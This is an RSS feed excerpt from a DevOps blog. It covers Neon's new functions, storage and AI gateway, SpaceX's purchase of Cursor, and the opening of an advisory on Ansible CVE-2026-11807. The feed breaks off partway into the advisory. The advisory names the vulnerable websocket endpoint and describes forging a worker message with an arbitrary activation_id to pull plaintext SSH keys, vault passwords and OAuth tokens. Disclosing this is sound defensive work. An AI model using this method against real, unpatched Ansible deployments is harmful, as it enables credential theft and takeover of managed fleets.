<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>One region, new projects only.</strong> Everything is in AWS <code>us-east-2</code> and only works on projects created inside the preview. You cannot bolt these features onto an existing production database today.</p>
</div></div></div><ul>
<li><strong>Functions are request/response, not a job runner.</strong> Great for the agent&#39;s synchronous loop and streaming; background work (queues, retries, schedules) still belongs to something like Inngest or QStash.</li>
<li><strong>Two gateway dialects, and it matters.</strong> The <code>OPENAI_BASE_URL</code> Neon injects points at the OpenAI <em>Responses</em> API route. A plain chat-completions call needs the <code>mlflow</code> dialect route instead. I hit a <code>404</code> until I switched routes. The SKILL docs the template ships actually explain this, which is the kind of detail that saves you ten minutes if you read it first.</li>
<li><strong>Billing is half-public.</strong> Per-model token prices are listed, but whether there is a markup or preview credits on top is not spelled out. Fine for a demo, a question to ask before a budget.</li>
<li><strong>The convenience is also coupling.</strong> One config file declaring your functions, buckets, and gateway is, by design, Neon-shaped. The S3-compatible API and standard SDKs keep the exit ramps wide, but this is a bet on one vendor for four things you used to buy separately.</li>
</ul>
<h2 id="h2-so-is-it-real" class="group relative scroll-mt-24">
        <a href="#h2-so-is-it-real" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          So is it real?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-so-is-it-real"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Yes, with an asterisk for &quot;preview.&quot; The genuinely useful part is not any single feature, it is that the four pieces an agent needs arrive together, branch together, and authenticate with one credential. If you have ever spent the first afternoon of an AI side project wiring a database to a compute host to an S3 bucket to a model provider, collapsing that into one <code>neon.ts</code> and one <code>deploy</code> is a real reduction in moving parts.</p>
<p>Whether you should build on it today depends on your appetite for a private preview and for vendor consolidation. But as a statement of direction, an agent stack from one CLI is a clear one. We dig into the strategy behind it in <a href="https://devops-daily.com/posts/neon-backend-platform-not-just-postgres">Neon is becoming a backend platform, not just Postgres</a>, and we benchmark Neon&#39;s database side in the <a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">Neon vs Supabase series</a>. As these features leave preview, we will keep testing them the same way: real projects, real output, and the demo code published so you can run it yourself.</p>
<p>The full project is on GitHub. Clone it, point <code>neonctl</code> at a new <code>us-east-2</code> project, and <code>deploy</code>:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-ai-agent"></div>]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Neon Is Becoming a Backend Platform, Not Just Postgres]]></title>
      <link>https://devops-daily.com/posts/neon-backend-platform-not-just-postgres</link>
      <description><![CDATA[In June 2026 Neon added serverless functions, S3-compatible object storage, and an AI gateway to its database. The interesting part is not any one feature, it is the through-line: everything branches with your data. Here is what shipped, what it competes with, and where the seams still show.]]></description>
      <pubDate>Fri, 26 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-backend-platform-not-just-postgres</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[postgres]]></category><category><![CDATA[serverless]]></category><category><![CDATA[platform-engineering]]></category><category><![CDATA[architecture]]></category>
      <content:encoded><![CDATA[<p>For most of its life, Neon had a one-sentence pitch: serverless Postgres that branches like Git. You got a database that scaled to zero, forked in milliseconds, and charged you for what you used. Everything else (your compute, your file storage, your AI calls, your auth) you wired up somewhere else and pointed at the connection string.</p>
<p>In June 2026 that sentence got longer. Neon shipped a private preview that adds three new surfaces around the database: serverless <strong>Functions</strong>, S3-compatible <strong>Storage</strong>, and an <strong>AI Gateway</strong> for model calls. A fourth, <strong>Neon Auth</strong>, shows up in the templates. None of these is novel on its own. Functions look like Lambda, storage looks like S3, an AI gateway looks like a dozen other AI gateways. The reason it is worth a closer look is the through-line connecting them, and that through-line is the same primitive Neon already built its name on: branching.</p>
<p>This is an analysis of what actually shipped, what it replaces, and where it is still clearly a preview. I created a new project and deployed against it while writing this, so the specifics below are from the real thing, not the marketing page.</p>
<h2 id="h2-what-shipped" class="group relative scroll-mt-24">
        <a href="#h2-what-shipped" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What shipped
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-shipped"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Four pieces, all in private preview, all in AWS <code>us-east-2</code>, all for new projects only.</p>
<p><strong>Neon Functions</strong> are Node.js compute deployed onto a database branch. You declare them in a <code>neon.ts</code> config file, write a standard Fetch-API handler (Hono is the recommended framework), and run <code>neonctl deploy</code>. Each branch gets its own function URL, the <code>DATABASE_URL</code> is injected automatically, and the function runs in the same region as the branch, so there is no cross-region hop to the database. They support streaming and long-lived connections (WebSockets, server-sent events), which is the deliberate split from request-scoped serverless: these are not for background jobs, they are for request/response and real-time work.</p>
<p><strong>Neon Storage</strong> is S3-compatible object storage. Your existing AWS SDK, boto3, or <code>aws</code> CLI talk to it unchanged. The twist is that storage is scoped to a branch, so when you fork a database branch, its files fork with it.</p>
<p><strong>Neon AI Gateway</strong> is a single credential that fronts models from Anthropic, OpenAI, Google, and a few open-source providers. The OpenAI and Anthropic SDKs work without code changes; you point them at a per-branch gateway endpoint. The published catalog lists around 25 models, priced per million tokens at what look like each provider&#39;s own list rates (Claude Haiku 4.5 at $1/$5 in/out, GPT-5 Nano at $0.05/$0.40, Gemini 2.5 Flash at $0.30/$2.50).</p>
<p><strong>Neon Auth</strong> rounds it out with authentication that does not require standing up a separate identity service, used in the realtime-chat template alongside Next.js.</p>
<h2 id="h2-the-through-line-is-branching" class="group relative scroll-mt-24">
        <a href="#h2-the-through-line-is-branching" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The through-line is branching
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-through-line-is-branching"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Take those four features and the obvious read is &quot;Neon is cloning Supabase,&quot; or &quot;Neon is becoming Vercel with a database.&quot; Both are partly true and both miss the point. The organizing idea is that every one of these surfaces inherits database branching.</p>
<p>A Neon branch already gave you an isolated copy of your data in milliseconds, with copy-on-write so it was cheap. Now that same branch gives you:</p>
<ul>
<li>an isolated <strong>function</strong> at its own URL, running your latest code against that branch&#39;s data,</li>
<li>an isolated <strong>storage</strong> namespace, so files written in a preview branch never touch production objects,</li>
<li>an isolated <strong>AI Gateway</strong> endpoint, so model usage on a feature branch is its own thing.</li>
</ul>
<p>That is the part you cannot easily assemble from separate vendors. You can stitch Lambda, S3, an AI gateway, and an auth provider together yourself, plenty of teams have. What you cannot easily do is make all of them fork in lockstep when you open a pull request, and then throw the whole set away when the branch merges. The preview environment stops being &quot;a copy of the database plus a pile of shared, mutable infrastructure&quot; and becomes a genuinely isolated copy of the backend.</p>
<p>If you have ever had a preview deployment write a test file into the production S3 bucket, or seen a staging job run up a bill against the same AI key as prod, you already understand why branch-scoped everything is the actual feature here.</p>
<h2 id="h2-what-it-replaces-and-the-tax-it-removes" class="group relative scroll-mt-24">
        <a href="#h2-what-it-replaces-and-the-tax-it-removes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it replaces, and the tax it removes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-it-replaces-and-the-tax-it-removes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The clearest way to see the value is to count the moving parts in a typical &quot;branchable AI app&quot; today versus on this platform. Standing up one environment the assemble-it-yourself way usually means a database, a compute host, an object store, a few model-provider keys, and an auth service, each with its own account, credential, and region to keep in sync.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Distinct services and credentials to wire up per environment&quot;,&quot;caption&quot;:&quot;Illustrative count for a branchable AI app, not a benchmark.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Assemble it yourself&quot;,&quot;value&quot;:7},{&quot;label&quot;:&quot;Neon platform&quot;,&quot;value&quot;:1}]}"></div><p>That count is illustrative, not measured: your stack may have more or fewer pieces. But the direction is the real claim. Every separate service is another credential to rotate, another thing to provision per preview environment, and another place for prod and staging to accidentally share state. Collapsing that to one account with auto-injected, per-branch credentials is less a feature than the removal of a tax you have been quietly paying.</p>
<p>There is a second, quieter tax it removes: distance. Because functions run in the same region as the branch, the function-to-database round trip is local. A lot of &quot;serverless Postgres is slow&quot; folklore is really &quot;my Lambda in one region is talking to my database in another, over a connection it has to re-establish on every cold start.&quot; Co-locating the compute with the branch sidesteps that specific problem.</p>
<h2 id="h2-where-the-seams-still-show" class="group relative scroll-mt-24">
        <a href="#h2-where-the-seams-still-show" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where the seams still show
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-the-seams-still-show"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is a private preview, and it reads like one. Worth being clear-eyed about the limits before you plan anything around it.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>One region, new projects only.</strong> Everything is in AWS <code>us-east-2</code> and only works on projects created after the preview opened. Your existing Neon databases will not grow these features in place, which matters if you were hoping to bolt functions onto a production project.</p>
</div></div></div><ul>
<li><strong>Functions are not a job runner.</strong> They are explicitly request/response and real-time, not background jobs. Queued, retryable, cancellable work still belongs to something like QStash or Inngest. That is an honest scoping decision, but it means &quot;move my whole backend here&quot; is not yet on the table.</li>
<li><strong>Fixed function sizing.</strong> Memory is fixed (2048 MiB at preview), so this is not a knob-for-everything compute platform yet.</li>
<li><strong>Billing is half-documented.</strong> The per-model token prices are public and look like pass-through, but Neon has not publicly spelled out whether there is a markup or preview credits on the AI Gateway. For a side project that is noise; for a budget forecast it is a question to ask before you commit.</li>
<li><strong>Lock-in is the real trade.</strong> The whole pitch is integration: one config file, one credential, everything branching together. That convenience is also coupling. An S3-compatible API and standard SDKs keep the exit ramps wider than a fully proprietary stack would, but a <code>neon.ts</code> that declares your functions, buckets, and gateway is, by design, Neon-shaped.</li>
</ul>
<h2 id="h2-who-should-actually-care" class="group relative scroll-mt-24">
        <a href="#h2-who-should-actually-care" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who should actually care
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-who-should-actually-care"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If you run a large, already-wired backend with mature infrastructure-as-code, none of this is urgent. You have solved preview environments, even if the solution is a pile of Terraform and a shared staging bucket.</p>
<p>The teams this is aimed at are the ones for whom that pile is the problem. Specifically:</p>
<ul>
<li><strong>Anyone building agents.</strong> An agent wants a database to remember things, compute that can stream tokens without a timeout, storage for what it generates, and model access. Getting all four from one CLI, branchable together, is a genuinely shorter path than assembling them. It is not a coincidence that the flagship templates are agents and MCP servers.</li>
<li><strong>Teams that live in preview environments.</strong> If every pull request should get a real, isolated backend and yours currently get a database copy plus shared everything-else, branch-scoped functions and storage close that gap.</li>
<li><strong>Small teams shipping AI features.</strong> The combination of &quot;Postgres you already use&quot; and &quot;model calls without managing three provider accounts&quot; removes a couple of the most annoying setup steps.</li>
</ul>
<p>The honest framing is that Neon is making a bet: that the database, not the compute platform, is the right center of gravity for a backend, because the database is where your state and your branching already live. Vercel is making the opposite bet from the compute side, and Supabase has been making a similar bundled-backend bet for years. Whether &quot;everything branches with your data&quot; is a durable advantage or a feature others copy, the next year will tell.</p>
<p>For now, the thing to internalize is that &quot;Neon&quot; no longer means &quot;a Postgres host.&quot; It means a database with compute, storage, and model access growing out of it, all sharing the one trick Neon was already good at. If you have only ever evaluated it as a place to put a connection string, it is worth a second look on those terms.</p>
<p>We benchmark Neon&#39;s database side in depth in our <a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">Neon vs Supabase series</a>, and keep a running <a href="https://devops-daily.com/comparisons/neon-vs-supabase">Neon vs Supabase comparison</a> covering architecture and pricing side by side. As these platform features leave preview, we will put them through the same treatment: real projects, real numbers, and the harness published so you can argue with our data instead of someone&#39;s vibes.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[SpaceX Just Bought Cursor for $60B. What That Means If Your Team Lives in It]]></title>
      <link>https://devops-daily.com/posts/spacex-cursor-acquisition-betting-on-one-ai-tool</link>
      <description><![CDATA[SpaceX is acquiring Anysphere, the maker of Cursor, in a $60 billion all-stock deal, the largest acquisition of a venture-backed startup ever. The number is the headline. The real question for engineering teams is what it means to build your daily workflow on a tool whose owner just changed.]]></description>
      <pubDate>Thu, 25 Jun 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/spacex-cursor-acquisition-betting-on-one-ai-tool</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[ai]]></category><category><![CDATA[tooling]]></category><category><![CDATA[developer-experience]]></category><category><![CDATA[vendor-lock-in]]></category><category><![CDATA[industry]]></category>
      <content:encoded><![CDATA[<p>On June 16, 2026, SpaceX announced it is acquiring Anysphere, the company behind the AI code editor Cursor, in an all-stock deal valued at about <strong>$60 billion</strong>. Reporting from <a href="https://techcrunch.com/2026/06/16/spacex-to-acquire-cursor-for-60b-in-stock-days-after-blockbuster-ipo/">TechCrunch</a>, <a href="https://www.cnbc.com/2026/06/16/spacex-spcx-cursor-acquisition-ipo.html">CNBC</a>, and others describes it as the largest acquisition of a venture-backed startup on record, landing days after SpaceX&#39;s own blockbuster IPO. Anysphere shareholders take SpaceX stock; the deal is expected to close in the third quarter pending regulatory approval.</p>
<p>The price is the headline everyone is sharing. For an engineering audience, the price is the least interesting part. Cursor reportedly runs around $2.6 billion in annualized revenue, which means a very large number of teams now do their daily work inside an editor whose owner, roadmap, and incentives changed overnight. That is the part worth thinking about, and it is not really a story about Cursor. It is a story about what it means to make any single AI tool load-bearing in how your team ships software.</p>
<h2 id="h2-why-a-devops-audience-should-care-about-an-ma-deal" class="group relative scroll-mt-24">
        <a href="#h2-why-a-devops-audience-should-care-about-an-ma-deal" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why a DevOps audience should care about an M&A deal
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-a-devops-audience-should-care-about-an-ma-deal"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Most acquisition coverage is for investors. This one matters operationally because of how deeply AI coding tools have embedded themselves into the workflow in the last two years. An AI editor is not a side utility like a linter you could swap in an afternoon. For teams that have leaned all the way in, it is where code gets written, where context lives, where custom rules and prompts and integrations accumulate. It has quietly become infrastructure.</p>
<p>And infrastructure with a single vendor behind it carries a specific risk that has nothing to do with whether the vendor is good. We watched a version of this play out when <a href="https://devops-daily.com/posts/government-pulled-fable-mythos-what-builders-should-learn">a frontier model was pulled by government order overnight</a> and every team building on it had to scramble. An acquisition is a gentler version of the same lesson: the thing your workflow depends on can change hands, change direction, or change pricing, and your dependency on it is exactly as deep as you let it become.</p>
<h2 id="h2-what-actually-changes-when-the-owner-changes" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-changes-when-the-owner-changes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What actually changes when the owner changes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-actually-changes-when-the-owner-changes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Acquisitions rarely break anything on day one. Cursor will keep working tomorrow. The risk is slower and shows up over quarters:</p>
<ul>
<li><strong>Roadmap drift.</strong> A startup optimizes for its users because it has to. A division inside a $2 trillion company optimizes for that company&#39;s strategy, which here is explicitly expanding into enterprise AI. Features you rely on may get more attention, or less, depending on whether they serve the new owner&#39;s goals.</li>
<li><strong>Pricing and packaging.</strong> New ownership eventually means new monetization. The plan you standardized your team on is a decision someone else now controls.</li>
<li><strong>Data and trust posture.</strong> Where your code and prompts go, and who can see them, is governed by the new parent&#39;s policies. For regulated teams that alone is worth a fresh read of the terms.</li>
<li><strong>Continuity.</strong> Most acquisitions go fine. Some lead to products being folded, rebranded, or sunset. You do not need to predict which; you need your workflow to survive either outcome.</li>
</ul>
<p>None of these is a reason to panic. They are reasons to know how exposed you are before the answer matters.</p>
<h2 id="h2-keeping-your-ai-tooling-swappable" class="group relative scroll-mt-24">
        <a href="#h2-keeping-your-ai-tooling-swappable" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Keeping your AI tooling swappable
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-keeping-your-ai-tooling-swappable"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The healthy response is not to abandon Cursor. It is good software, and it is not going anywhere this quarter. The response is to make sure your team&#39;s ability to work does not depend on it continuing to be exactly what it is today. A few habits keep the optionality cheap:</p>
<ol>
<li><strong>Keep the AI layer separable from the workflow.</strong> The more your build, review, and CI processes assume one specific editor, the harder a future switch becomes. Treat the AI assistant as an accelerant on top of a workflow that works without it, not as the workflow.</li>
<li><strong>Do not hard-wire to proprietary-only features.</strong> Every vendor offers sticky features that lock you in. Use them with eyes open, and keep the core of how you work expressible in tools you do not control. Most AI editors speak the same underlying model APIs; the lock-in is in the surrounding glue.</li>
<li><strong>Keep a qualified alternative warm.</strong> You do not have to use a second tool daily, but knowing that your team could move to another AI editor or assistant in a week, because you have tried it and it fits, turns a forced migration from a crisis into a decision.</li>
<li><strong>Watch the ownership and policy surface, not just the changelog.</strong> Acquisitions, pricing changes, and data-policy updates do not show up in release notes. For a tool this central, someone should be tracking the business news the way you track its features.</li>
</ol>
<p>This is the same playbook we argued for with <a href="https://devops-daily.com/posts/ai-sre-agents-what-they-fix-and-break">AI SRE agents</a> and with model providers generally: adopt the useful thing, get real value from it, and keep your ability to leave proportional to how much you depend on it.</p>
<h2 id="h2-the-honest-read" class="group relative scroll-mt-24">
        <a href="#h2-the-honest-read" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The honest read
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-honest-read"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>It is easy to turn a $60 billion headline into a hot take in either direction, that this validates AI coding or that it signals a bubble. Neither is a useful conclusion for someone who has to ship code on Monday. The useful conclusion is narrower and more durable: the AI development tools are consolidating into the hands of large platform companies, and the tools your team treats as essential are increasingly owned by entities whose priorities are not your productivity.</p>
<p>That is not a crisis. Cursor users are not in trouble, and good tools getting resources can mean better tools. It is simply a prompt to check a dependency you may not have consciously chosen to take on. The teams that will be unbothered by whatever Cursor becomes under SpaceX are the ones who could switch if they had to, and who therefore never have to.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Your Automation Platform Is a Credential Honeypot: Ansible CVE-2026-11807]]></title>
      <link>https://devops-daily.com/posts/ansible-automation-platform-credential-leak-cve-2026-11807</link>
      <description><![CDATA[A missing authorization check in Event-Driven Ansible lets any logged-in user pull plaintext vault passwords, SSH keys, and OAuth tokens out of Ansible Automation Platform. It is a CVSS 9.6, it is patched, and it is a reminder of what your automation control plane really holds.]]></description>
      <pubDate>Thu, 25 Jun 2026 13:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/ansible-automation-platform-credential-leak-cve-2026-11807</guid>
      <category><![CDATA[Security]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[security]]></category><category><![CDATA[ansible]]></category><category><![CDATA[cve]]></category><category><![CDATA[secrets]]></category><category><![CDATA[automation]]></category>
      <content:encoded><![CDATA[<p>Think about what your automation platform actually stores. To configure a fleet, Ansible Automation Platform (AAP) holds the credentials to reach that fleet: SSH keys to your servers, vault passwords that unlock your secrets, OAuth tokens to your cloud accounts. The whole point of the platform is that it is the one system trusted to talk to everything else. That also makes it the single richest target you operate, and CVE-2026-11807 is what happens when the lock on that target slips.</p>
<p>The bug, disclosed in late June 2026 and rated <strong>CVSS 9.6 (critical)</strong>, lets <em>any authenticated user</em> retrieve those credentials in plaintext. Not an admin. Anyone who can log in. Here is what it is, who it hits, and the broader point it makes about where your secrets really live.</p>
<h2 id="h2-what-the-bug-is" class="group relative scroll-mt-24">
        <a href="#h2-what-the-bug-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the bug is
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-the-bug-is"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The flaw lives in Event-Driven Ansible (EDA), the part of AAP that reacts to events and triggers rulebooks. EDA exposes a websocket API at <code>/api/eda/ws/ansible-rulebook</code> for worker processes to communicate. The problem: that endpoint did not verify the caller&#39;s permissions when processing worker messages. It assumed anyone connecting was a legitimate worker.</p>
<p>So an authenticated user can connect to that websocket and send a forged worker message carrying an arbitrary <code>activation_id</code>. The server, trusting the message, responds with the credentials associated with that activation, and it returns them in plaintext. According to Red Hat&#39;s advisory those credentials include OAuth tokens, vault passwords, and SSH keys: the exact material an attacker needs to move from &quot;I have a low-privilege login&quot; to &quot;I own everything this platform manages.&quot;</p>
<p>The CVSS vector explains the 9.6: network attack vector, low complexity, no user interaction, and a low privilege requirement (you need to be authenticated, but nothing more). The only reason it is not a perfect 10 is that &quot;authenticated&quot; bar, which in many real deployments is a low one.</p>
<h2 id="h2-who-is-affected" class="group relative scroll-mt-24">
        <a href="#h2-who-is-affected" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who is affected
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-who-is-affected"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
